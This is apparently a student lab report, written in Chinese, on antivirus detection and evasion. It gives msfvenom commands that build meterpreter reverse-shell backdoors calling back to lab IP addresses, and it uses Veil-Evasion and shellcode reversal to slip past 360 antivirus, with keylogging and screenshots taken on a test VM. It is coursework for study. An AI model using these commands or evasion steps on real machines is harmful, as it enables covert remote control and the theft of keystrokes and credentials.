20145226夏艺华《网络对抗》免杀原理与实践
基础问题回答
杀软是如何检测出恶意代码的?
(1)基于特征码的检测:杀毒软件有一个病毒的特征码(由一个不大于64字节的特征串组成)库,通过识别恶意代码的特征码检测恶意代码。
(2)启发式恶意软件检测:“When I see a bird that walks like a duck and swims like a duck and quacks like a duck, I call that bird a duck.”分析对象文件与病毒特征库中的病毒原码进行比较。
(3)基于行为的恶意软件检测:在一种程序运行的状态下对其行为进行监控,如果有敏感行为会报毒,是一种动态的监测与捕捉。
免杀是做什么?
使恶意代码绕过杀毒软件的查杀
免杀的基本方法有哪些?
(1)通过花指令、加壳、重组编码shellcode等方法来绕过杀毒软件的检测
(2)通过改变恶意代码的操作方式及通讯方式等行为来避免被查杀
(3)自己编写(不再病毒库中)
实践总结与体会
这次实验有毒!!!
毒大了!!!开始做的步骤完全没有问题 但就是要被杀[smile]
最后 终于 出来 了 真是感动。。。
离实战还缺些什么技术或步骤?
技术远远不够实际应用,还要积累更多丰富的知识才能达到实战的水平。
实践过程记录
msfvenom直接生成meterpreter后门程序
这是后门实验已经实现的~
· 使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.43.51.202 LPORT=26 -f exe >20145226.exe来生成后门程序,如图所示:
· 然后发送到windows 7里。
· 现在在kali中用msfconsole命令开启msf,并进行设置,步骤如图所示
:
· 此时开始监听,在windows 7中运行后门程序20145226.exe就可成功控制远程shell,如图使用命令dir查看系统版本信息:
· 使用命令screenshot对靶机进行截图:
· 使用命令keyscan_start开始和keyscan_dump结束记录键盘输入:
(如果是在输入密码,瞬间暴露[smile])
· 获得运行Meterpreter会话的用户名
ps:由于我的win 7是我自己的虚拟机,没有连接摄像头,所以没有偷拍成功~
使用Veil-Evasion生成可执行文件
· 在kali虚拟机终端输入veil-evasion进入veil-evasion环境:
· 输入use python/meterpreter/rev_tcp,之后生成可执行文件veil5226.exe
对应的py文件,不明觉厉:
· 将生成的可执行文件传到主机,gg,被360发现了
· 上传到virscan扫描一下,4/39发现病毒诶
使用C语言调用Shellcode
在kali主机下,进入终端,执行指令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.132 LPORT=443 -f c
LHOST:攻击机IP
LPORT:反弹连接端口
c:生成一个c语言格式的Shellcode数组
将上述代码从虚拟机里粘出来到Microsoft Visual Studio 2010进行编译运行生成可执行文件
(涉及木马不便展示)
gg,又被360发现了。。。
很sad。
修改shellcode——逆序
原有shellcode不变,只在Microsoft Visual Studio 2010下对源代码进行逆序修改:
对shellcode数组求逆序后输出到文件:
输出到文本后复制粘贴到木马源代码中,为如下格式:
x:按照输出数转换为16进制的实际位数输出,所以显示出了32位16进制数(补码形式)
替换一下ffffff,如图:
靶机为win10系统,360杀毒。
免杀的实现与回连
在虚拟机中启动监听,成功回连;然后再getuid、ls、ipconfig一下,啥都暴露了[smile]
360杀毒软件也没有查出病毒!
实验感想
这个实验做得那么艰辛是因为。。。我每次生成的exe都是放到win7虚拟机里面去运行的,永远都是各种缺少某个dll文件我的问题,让人感到崩溃。。。最后放到主机win10运行一下就成功了。。。蓝瘦香菇